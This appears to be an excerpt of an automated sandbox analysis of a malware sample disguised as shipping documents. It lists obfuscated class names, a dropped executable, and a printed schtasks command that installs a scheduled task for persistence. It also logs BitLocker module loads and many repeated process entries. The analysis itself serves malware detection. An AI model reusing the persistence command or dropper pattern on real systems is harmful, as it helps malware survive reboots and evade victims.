Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, S0jgB4009bU263QHpIL.cs	High entropy of concatenated method names: 'v0XQk7CflK', 'snsQzEGxC7', 'Chmr1ea3qy', 'x2Nr0ve1kG', 'Y24rOZENm0', 'CRxriy9j7j', 'qGRrYZ8wvp', 'mw9rpW2k7o', 'lDLrshdrL5', 'UbJr32aJhH'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, X6FfvbYiXsq3qC6MfI.cs	High entropy of concatenated method names: 'cxP07ub6rx', 'vyn09uOkRK', 'Oy50yeETR8', 'PXs0b2PZYb', 'txx0axGkjL', 'RTI0WH5Bmj', 'gDQ2P5pFt9gneIkXYo', 'V11SgAE5O4tEEdEouG', 'bok002dCII', 'YoF0iLivQJ'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, MKHckiGbnbdbS8HRcy.cs	High entropy of concatenated method names: 'AyZRJORdP8', 'YtGRkMEMEr', 'z6TE1ebBlA', 'R86E0eO5VL', 'ilORoL04dT', 'SKoR4CW98x', 'EYpRdccTGw', 'HC1RZYt4f2', 'xdBRPwQGvh', 'CpRRnobVPn'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, YjLPTItH5BmjjlXbDS.cs	High entropy of concatenated method names: 'KQOwpxepFE', 'wlZw324bgv', 'IsCwC0sGKI', 'ji7w7qKvMx', 'ssbw9qD2Qw', 'oobC6vMmgy', 'NIDCGGT7ev', 'ehACxjOWWk', 'aLnCJkDCg2', 'YSVCHJ0rDv'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, RZYbYtV9JyyAirxxxG.cs	High entropy of concatenated method names: 'wgdCDCXkop', 'qwQClS1aTw', 'gMkNvDjVtm', 'rc2NL2utuK', 'MJeNSWUxiL', 'RL8NfrZomD', 'CoyNF4UjrI', 'w8kNMl0ieM', 'hESNgt6niw', 'DAeNmBD0Tq'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, VJVcxPfJbmowbbVQGB.cs	High entropy of concatenated method names: 'BMmwnUnv4o', 'uPwwqAWfsT', 'gh0w6N34Ql', 'ToString', 'EEMwGEk2d7', 'F8RwxHijub', 'F7vlLoTmj8WD3spf87Z', 'ncBc96TIFxwxhZeopFt', 'PHyy6wTnCAU5YLEC87f', 'bwwCoKTMdPms40PFuJy'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, zWHF3JkqnhIH1cVBpy.cs	High entropy of concatenated method names: 'AUiQN0Que0', 'PI3QC5uCs2', 'P1eQwHSDGj', 'h8tQ7Tgav5', 'TkmQU5Za7D', 'tHWQ9kORmy', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, wA2Sx7d0bdRhovZdnf.cs	High entropy of concatenated method names: 'oogAe5vZHx', 'cYDAuJIMrL', 'lJ3At4rQ1R', 'loSA2LEoaK', 'ncxAL1w9nO', 'uEKASMWa3D', 'FGeAF7rJjD', 'wasAMoDbDI', 'susAmshBRY', 'OWOAornHPY'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, Rub6rxeXynuOkRKaly.cs	High entropy of concatenated method names: 'oZn3ZIs3r6', 'uTF3Pkhq2H', 'EWU3n1ggGf', 'HSV3q29w8f', 'G9o36kuaZk', 'DVF3GIwihp', 'BGC3x526V3', 'CHg3J7nbqd', 'dhQ3HbO4pm', 'PrH3kFfT1R'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, OpU5QkxYDTk2XXfygv.cs	High entropy of concatenated method names: 's5PUaPt2NF', 'YqGURVEFtk', 'PYLUUtRaTN', 'eDHUr56l4O', 'fpUUXw3mOG', 'qy2UjOtWsN', 'Dispose', 'mnpEsD5WhC', 'ym2E3do5KU', 'cVgEN8xJxA'

Drops PE files

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1E8.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
